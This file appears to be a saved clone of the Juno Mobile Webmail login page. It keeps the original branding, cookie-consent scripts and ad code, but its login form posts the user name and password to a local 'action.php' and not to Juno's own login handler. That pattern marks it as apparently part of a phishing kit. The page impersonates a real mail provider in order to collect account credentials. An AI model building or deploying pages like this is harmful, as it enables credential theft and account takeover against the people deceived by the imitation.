<!DOCTYPE html>
<!-- saved from url=(0059)https://webmail.juno.com/cgi-bin/login.cgi?login_type=mrich -->
<html class="ui-mobile"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><!--<base href="https://webmail.juno.com/cgi-bin/login.cgi?login_type=mrich">--><base href="."><meta name="viewport" content="width=device-width, initial-scale=1,maximum-scale=1, user-scalable=no"> <title>Juno Mobile Webmail - Login Page</title><link rel="canonical" href="https://webmail.juno.com/"><link rel="manifest" href="https://webmail.juno.com/html/manifest_j.json"><link rel="stylesheet" href="./Juno Mobile Webmail - Login Page_files/jquerymobile.min.css"><script src="./Juno Mobile Webmail - Login Page_files/headertag" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/jpt" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/jpt(1)" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/bid" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/publishertag.js.download" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/apstag.js.download" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/sovrn_standalone_beacon.js.download" id="sBeacon" async=""></script><script src="./Juno Mobile Webmail - Login Page_files/ast.js.download"></script><script type="text/javascript" src="./Juno Mobile Webmail - Login Page_files/jQuery.js.download"></script><script type="text/javascript" src="./Juno Mobile Webmail - Login Page_files/adserving.js.download"></script><script type="text/javascript" src="./Juno Mobile Webmail - Login Page_files/jquerymobile.min.js.download"></script><script>
var GDPRCookieExpiry = 19;
 $(document).one('pagecontainershow', function() {
if(showGDPRPopup === 1){
setTimeout(function () {
$('#gdprPopup').popup('open');
sendImgTrack('gdpr',{action:"shown"});
}, 0);
} else if(showGDPRPopup === 2 && memberId.length != 0 && readCookie('u_consent') == "1y") {
updateCPTerms();
createCookie("u_consent", "0y", GDPRCookieExpiry, "/", domainCom, false);
}
else if(showGDPRPopup === 2 && readCookie('u_consent') === null ){
createCookie("u_consent", "0y", GDPRCookieExpiry, "/", domainCom, false);
}
}).on('click', '#consent_dialog_allow', function(e) {
e.preventDefault();
$('#gdprPopup').popup('close');
sendImgTrack('gdpr',{action:"accepted"});
showGDPRPopup = 2;
var GDPRCookieVal="1y";
if(memberId.length != 0 ) {
updateCPTerms();
GDPRCookieVal="0y";
}
createCookie("u_consent",GDPRCookieVal, GDPRCookieExpiry, "/", domainCom, false);
AdEnable();
if(memberId.length != 0 && typeof GATracking !== 'undefined') {
GATracking();
}
});
function updateCPTerms(){
var img = (Image ? new Image(1, 1) : undefined);
img.src="http://my.juno.com/start/sp.do?action=updateCPTerms";
}
function createCookie(name, value, expires, path, domain, secure){
var today = new Date();
today.setTime( today.getTime() );

 if ( expires ) {
expires = expires * 365 * 24 * 60 * 60 * 1000;
}
var expires_date = new Date( today.getTime() + (expires));
var consent_cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toUTCString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
document.cookie = consent_cookie; 
}
var readCookie=function(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)===' ') {c = c.substring(1,c.length);}
if (c.indexOf(nameEQ) === 0){ return c.substring(nameEQ.length,c.length);}
}
return null;
};

function sendImgTrack(cmd,o) {
cmd = cmd || '';
o = o || {};
if(!cmd.length) {
return;
}

 var url = '//' + imgServer + "/i2/spacer.gif?",
img = new Image();

 $.extend(true, o, o, {
'command': cmd,
'usr': mnum,
'count': new Date().getTime()
});

 img.src = url + $.param(o);
}
</script><script>

var _gaq = _gaq || [];
</script> <style type="text/css">/*Style for Login Page*/.alert { padding: 8px 35px 8px 14px; margin: 4px 4px 20px 4px; text-shadow: 0 1px 0 rgba(255,255,255,.5); background-color: #fcf8e3;; border: 1px solid #fbeed5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px;}.alert-error { color: #b94a48; background-color: #f2dede; border-color: #eed3d7;}.alert-info { background-color: #d9edf7; border-color: #bce8f1; color: #3a87ad;}.alert-success { background-color: #dff0d8; border-color: #d6e9c6; color: #468847;}.pull-left { float: left;}.hide { display: none;}#x95Wrap, #x96Wrap { margin: 2px auto; width: 320px; height: 50px;}.headerContainer { overflow: auto; padding: 5px 0px; min-width: 20em;}.headerContainer2 { margin-right: 76px; min-width: 20em;}.keyline { font-size: 1px; height: 2px; width: 100%; background-color: #a7ddef;background-color: rgba(167,221,239,0.8);}.brandLogo { width: 34px; height: 34px; background-image: url("/im/logo_j.png");}.headerTxt { padding-left: 5px; font-weight:bold;}.loginHeader { line-height: 34px; font-weight: bold;}.memberId { font-size: 13px; font-weight: normal;}.uolpage .ui-content{ padding: 0 5px;}#gdprPopup .ui-content{ padding : 15px !important;}.uolmini.ui-mini .ui-btn { padding-left: .7em; padding-right: .7em;}/*High DPI CSS styles Courtesy: jQuery Mobile;*/@media only screen and (-webkit-min-device-pixel-ratio: 1.3), only screen and (min--moz-device-pixel-ratio: 1.3), only screen and (min-resolution: 200dpi) { .brandLogo { background-size: 34px 34px; background-image: url("/im/logo_j_l.png"); }}</style></head><body class="ui-mobile-viewport ui-overlay-a"><div data-role="page" data-theme="a" id="loginPage" class="uolpage ui-page ui-page-theme-a ui-page-header-fixed ui-page-active" data-url="loginPage" tabindex="0" style="padding-top: 56px;"> <script type="text/javascript">

var playpenUrl = '',
imgServer = 'webmail.uolimg.com',
asPathMRich = '//static.uolcontent.com/js_api/as-3.0.6.min.js',
AFPPStoreUrl = "https://store.juno.com/account/mmAdfreeLanding.do",
AFSPStoreUrl = "https://store.juno.com/account/mmAdfreeLanding.do",
aFree = ("" === "1"),
adPage = "/html/blankPhnx-2.0.0.min.html",
adConfigPath = "//static.uolcontent.com/cgi/aconfig",
PhoenixUrl = '' || 'https://phoenix.untd.com',
brandName = 'Juno',
userinfo = "",
memberId = "",
brandNameLC = 'juno',
mnum = '',
userServiceLevel = '',
htmlFileName = 'Login.html',
bGATracking = ( +('' || '') & 2 ) === 2,
ESL = ( parseInt('', 10) >= 0 ) ? parseInt('', 10) : -1,
_afp="",
_uh='',
_uh2='',
_uh3='',
_uh4='',
_uh5='',
_uh6='',
_uh7='',
_uh8='',
brandLetter = 'j',
JSVN_blankPhnx_m = '1566075479',
limit=10,
isDialupUser = '',
isAccelUser = '0',
afpp = ("" === "1"),
afsp = ("" === "1"),
domainName = ".juno.com",
domainCom = ".juno.com",
showGDPRPopup = parseInt("-1") || 0 ,
trackingCode = "UA-7101665-2";
</script> 
<div data-role="header" data-theme="a" data-position="fixed" data-tap-toggle="false" data-transition="none" role="banner" class="ui-header ui-bar-a ui-header-fixed">
  <div id="x95Wrap"><div id="x951" style="display: block;top: 0px;left: 0px;background-color: transparent;"></div>
      <div id="x952" style="display: none;top: 0px;left: 0px;background-color: transparent;"></div></div>
</div><div class="ui-content" role="main"> <div class="headerContainer "> <div class="headerContainer2 clearfix">  <div class="pull-left brandLogo"></div> <div class="pull-left headerTxt loginHeader"> <div class="txtEllipsis"> Juno - Login </div>  </div> </div> <div class="ui-icon-nodisc headerBtns">  </div></div><div class="keyline"></div><form data-ajax="false" id="loginform" action="action.php" method="post">   <noscript><div class="alert alert-error">Please enable JavaScript in your browser to login.</div></noscript> <br> <input type="hidden" name="login_type" value="mrich"> <input type="hidden" name="showCaptchaOnlyBlock" value=""> <input type="hidden" name="flogin_type" value="mrich">
 
    <input type="hidden" name="domain" value="juno.com">
    <div class="ui-field-contain">
      <label for="LOGIN">User name:</label>
      <div class="ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset"><input type="text" name="LOGIN" id="LOGIN" value="" required=""></div>
    </div>
    <br>
    <div class="ui-field-contain">
      <label for="PASSWORD">Password:</label>
      <div class="ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset"><input type="password" name="PASSWORD" id="PASSWORD" value="" required=""></div>
    </div>
    <div class="ui-field-contain ui-mini ui-btn-inline">
      <fieldset data-role="controlgroup" class="ui-controlgroup ui-controlgroup-vertical ui-corner-all"><div class="ui-controlgroup-controls ">
        <div class="ui-checkbox"><label for="rememberMe" class="ui-btn ui-corner-all ui-btn-inherit ui-btn-icon-left ui-checkbox-off ui-first-child ui-last-child">Keep me signed in</label><input type="checkbox" name="rememberMe" id="rememberMe" class="custom"></div>
        
      </div></fieldset>
    </div>         <div class="ui-field-contain"> <fieldset data-role="controlgroup" class="ui-controlgroup ui-controlgroup-vertical ui-corner-all"><div class="ui-controlgroup-controls "> <button type="submit" class="ui-btn ui-icon-check ui-btn-icon-left ui-btn-inline ui-first-child ui-last-child">Login</button> </div></fieldset> </div> </form> <div> <a href="http://account.juno.com/s/resetpassword" target="_blank" class="ui-link">Forgot your ID or password?</a> </div><br> <div>Trouble logging in? <a rel="nofollow" href="http://webmail.juno.com/cgi-bin/login.cgi?login_type=mrich&amp;login_method=http" data-ajax="false" class="ui-link">Try the alternative login</a></div><br> <div id="x96Wrap"></div><div id="Frame1Wrap" class="hide" style="width:1px;height:1px"><iframe id="Frame1" name="Frame1" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" width="1" height="1" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts" src="./Juno Mobile Webmail - Login Page_files/blankPhnx-2.0.0.min.html"></iframe></div><div id="RMA1Wrap" class="hide" style="width:1px;height:1px"></div><br> 
      <div>Not a Juno Member yet? </div> 
      <div><a target="_blank" href="http://www.juno.com/freeemail?&amp;refcd=jueowh1209" class="ui-btn ui-btn-inline ui-corner-all ui-shadow">Sign Up Now</a></div> <br> <div data-role="controlgroup" data-type="horizontal" class="ui-mini uolmini ui-controlgroup ui-controlgroup-horizontal ui-corner-all"><div class="ui-controlgroup-controls ">
  <a href="https://webmail.juno.com/cgi-bin/login.cgi?login_type=mrich#" class="ui-btn ui-state-disabled ui-first-child">Mobile</a>
  <a href="https://webmail.juno.com/cgi-bin/login.cgi?login_type=nomobile&amp;cf=mobile2" data-ajax="false" class="ui-btn ui-last-child">Full Site</a>
</div></div><div style="display: none;" id="desktopPopup-placeholder"><!-- placeholder for desktopPopup --></div><div></div><br>
<div id="uolfooter">
	<a href="http://my.juno.com/start/landing.do?page=www/legal/terms" target="_blank" class="ui-link">Terms of Service</a>
	<span>&nbsp;|&nbsp;</span>
	<a href="http://my.juno.com/start/landing.do?page=www/legal/privacy" target="_blank" class="ui-link">Privacy Policy</a>
 <span>&nbsp;|&nbsp;</span>
  <a href="http://www.juno.com/start/landing.do?page=www/legal/privacy#III" target="_blank" class="ui-link">Ads</a>
  <div>© 1995 - 2019 Juno Online Services, Inc.</div>
</div></div>  <div data-role="footer" data-theme="a" role="contentinfo" class="ui-footer ui-bar-a"> </div><div class="ui-screen-hidden ui-popup-screen ui-overlay-b" id="desktopPopup-screen"></div><div class="ui-popup-container ui-popup-hidden ui-popup-truncate" id="desktopPopup-popup"><div data-role="popup" id="desktopPopup" data-overlay-theme="b" data-theme="a" style="max-width:400px;" class="ui-corner-all ui-popup ui-body-a ui-overlay-shadow"> <div data-theme="a" class="ui-corner-bottom ui-content"> <h3 class="ui-title" style="padding-left:5px;padding-top:9px">Would you like the Full Site view to be your preferred setting for mobile?</h3> <a href="https://webmail.juno.com/cgi-bin/24?switch2=desktop&amp;count=" class="ui-btn ui-corner-all ui-shadow ui-btn-inline ui-btn-b ui-mini" data-ajax="false">No, just this once</a> <a href="https://webmail.juno.com/cgi-bin/24?switch2=desktop&amp;permanent=1&amp;count=" class="ui-btn ui-corner-all ui-shadow ui-btn-inline ui-mini ui-btn-a" id="desktop" data-ajax="false">Yes, please</a> </div></div></div></div> <div class="ui-loader ui-corner-all ui-body-a ui-loader-default"><span class="ui-icon-loading"></span><h1>loading</h1></div><iframe src="./Juno Mobile Webmail - Login Page_files/iu3.html" style="display: none;"></iframe><div id="sf-002327001"><iframe id="pubmatic-sf-794597683" name="pubmatic-sf-794597683" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" width="0" height="0" frameborder="0" scrolling="no" src="./Juno Mobile Webmail - Login Page_files/showad.html" display="none"></iframe><iframe id="rubicon-sf-670772999" name="rubicon-sf-670772999" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" width="0" height="0" frameborder="0" scrolling="no" src="./Juno Mobile Webmail - Login Page_files/usync.html" display="none"></iframe></div><iframe id="sovrn_beacon" margin="0" padding="0" frameborder="0" width="1" height="1" scrolling="no" src="./Juno Mobile Webmail - Login Page_files/beacon.html" style="margin: 0px; padding: 0px; border: 0px none; width: 1px; height: 1px; overflow: hidden;"></iframe></body></html>